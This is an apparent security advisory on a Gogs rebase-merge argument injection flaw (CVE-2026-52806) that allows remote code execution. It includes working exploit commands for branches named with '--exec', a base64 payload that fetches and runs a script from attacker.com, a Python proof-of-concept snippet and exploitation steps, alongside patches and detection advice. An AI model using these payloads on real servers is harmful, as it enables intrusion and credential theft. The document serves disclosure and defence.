Listen to this Post
Gogs is a popular self-hosted Git service written in Go. A critical argument injection vulnerability exists in the pull request merge workflow, specifically within the “Rebase before merging” operation. The flaw resides in the `Merge()` function inside internal/database/pull.go, where the base branch name of a pull request is passed directly to the `git rebase` command without a POSIX `–` separator or proper sanitization.
An authenticated attacker can create a repository, enable the rebase merge option, and push a branch with a maliciously crafted name containing the `–exec` flag. When a pull request is created and merged using the rebase strategy, the branch name is interpreted by Git as a command-line argument rather than a branch reference. This causes the `–exec` flag to be processed, and the attacker-supplied command is executed via `sh -c` on the server.
The vulnerability exists because the `pr.BaseBranch` value, which originates from the URL parameter, is only validated using git rev-parse --verify <ref>—which checks that the ref resolves to a valid Git object but does not prevent argument injection. Git branch names can legally contain characters such as $, {, }, =, and -, allowing an attacker to craft a branch like --exec=touch${IFS}/tmp/pwned. During the rebase, this is parsed as the `–exec` flag, and the command executes.
The attack chain is fully automatable and does not require administrator privileges. Any authenticated user who can create a repository can enable rebase merging via the repository settings, making the exploit accessible to any registered user. On instances with open registration enabled (the default), this effectively allows unauthenticated attackers to gain remote code execution.
The vulnerability affects all Gogs versions up to and including 0.14.2, as well as the development branch 0.15.0+dev. A patch was released in version 0.14.3 on June 7, 2026. The issue has been assigned CVE-2026-52806.
DailyCVE Form
Platform: Gogs
Version: ≤ 0.14.2, 0.15.0+dev
Vulnerability: Argument Injection (CWE-88)
Severity: Critical (CVSS 9.9)
Date: 2026-03-16 (disclosed)
Prediction: Patch released 2026-06-07 (v0.14.3)
What Undercode Say
Analytics:
- CVE ID: CVE-2026-52806
- CVSS Score: 9.9 (Critical) — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- Affected Versions: All Gogs releases up to 0.14.2 and 0.15.0+dev (commit b53d3162)
- Exploit Availability: Public PoC exists (Metasploit module added)
- Patch Status: Fixed in v0.14.3 (June 7, 2026)
- CWE: CWE-88 – Improper Neutralization of Argument Delimiters in a Command
Bash Commands & Codes:
Create malicious branch
git update-ref 'refs/heads/--exec=touch${IFS}/tmp/pwned' HEAD
Push malicious branch
git push origin 'refs/heads/--exec=touch${IFS}/tmp/pwned:refs/heads/--exec=touch${IFS}/tmp/pwned'
Base64-encoded payload for complex commands
Example: curl https://attacker.com/shell.sh|sh
BRANCH="--exec=echo${IFS}Y3VybCBodHRwczovL2F0dGFja2VyLmNvbS9zaGVsbC5zaHxzaA==|base64${IFS}-d|sh"
git update-ref "refs/heads/$BRANCH" HEAD
Python PoC Snippet (from Rapid7):
Create repository via API
requests.post(f"{target}/api/v1/user/repos", auth=(user, pass), json={"name": repo_name})
Enable rebase merge
requests.post(f"{target}/{user}/{repo}/settings/advanced", data={"enable_pulls": "on", "pulls_allow_rebase": "on"})
Create PR with malicious base branch
pr_url = f"{target}/{user}/{repo}/compare/{malicious_branch}...{head_branch}"
requests.post(pr_url, data={"": "RCE"})
Trigger merge
merge_url = f"{target}/{user}/{repo}/pulls/1/merge"
requests.post(merge_url, data={"merge_style": "rebase"})
Exploit
The exploitation流程 is as follows:
- Authenticate to the Gogs instance as any valid user.
- Create a repository (or use an existing one where rebase merging is enabled).
- Enable rebase merging via the repository settings (Settings → Advanced → Allow rebase).
- Push a malicious branch with a name containing the `–exec` flag and the desired command (using `${IFS}` to bypass space restrictions).
- Create a pull request with the malicious branch as the base and a legitimate branch as the head.
- Wait for the background `TestPullRequests` goroutine to mark the PR as mergeable (approximately 5 seconds).
- Trigger the merge using the “Rebase before merging” option. The `git rebase` command executes with the malicious branch name as an argument, causing the injected `–exec` command to run on the server.
- Verify the command execution (e.g., check for created files or receive a reverse shell).
Key Details:
- The vulnerability is triggered in Step 3 of the `Merge()` function:
git rebase --quiet '<malicious>' 'head_repo/feature'. - The subsequent `git checkout` of the malicious branch fails, resulting in an HTTP 500 error, but the RCE has already occurred.
- On Windows, the base64 inline payload approach fails due to NTFS restrictions on the `|` character. Instead, the exploit uses a file-based payload delivery: the payload is committed as a script file, and the branch name becomes
--exec=sh${IFS}<filename>.
Protection
Immediate Mitigation:
- Upgrade to Gogs version 0.14.3 or later, which includes the fix.
- If upgrading is not possible, disable the “Rebase before merging” option for all repositories (though this may not be feasible for all instances).
- Restrict user registration to prevent untrusted users from creating accounts (set `DISABLE_REGISTRATION = true` in
app.ini).
Permanent Fix (Code-Level):
- Add a `–` separator to the `git rebase` command in
internal/database/pull.go:"git", "rebase", "--quiet", "--", pr.BaseBranch, remoteHeadBranch
- Validate branch names at the PR creation endpoint to reject names starting with
-:if strings.HasPrefix(baseRef, "-") { c.NotFound() return nil, nil, nil, nil, "", "" } - Apply `–` separators to all other `process.ExecDir` calls that use `pr.BaseBranch` (e.g.,
git clone -b,git checkout,git push). - Ensure all Git commands use the safe `git-module` API with `–end-of-options` where applicable.
Detection:
- Monitor server logs for errors containing `unknown option` or `exec=` in the context of `git checkout` or
git rebase:[bash] ...merge: git checkout '--exec=<...>': exit status 128 - error: unknown option `exec=<...>'
- Look for HTTP 500 errors on merge endpoints that may indicate exploitation attempts.
Impact
Successful exploitation allows an authenticated attacker to achieve remote code execution on the Gogs server with the privileges of the Gogs process user (typically
git). The impact is severe: - Server Compromise: Arbitrary command execution as the Gogs process user, enabling full control over the server.
- Cross-Tenant Data Breach: Read all repositories on the instance, including private repositories of other users, because all repositories are stored under a single `REPOSITORY_ROOT` directory with no OS-level isolation.
- Credential Theft: Access the database containing password hashes, API tokens, SSH keys, and 2FA secrets for all users.
- Lateral Movement: Pivot to other systems accessible from the server’s network.
- Supply Chain Attacks: Silently modify code in any hosted repository, potentially injecting backdoors or malicious code.
The vulnerability is especially dangerous because:
- Gogs ships with open registration enabled by default (
DISABLE_REGISTRATION = false), making it exploitable by unauthenticated attackers on default installations. - Any user who creates a repository is automatically its admin and can enable rebase merging without special permissions.
- The exploit leaves minimal traces (only a 500 error in logs), making detection difficult.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
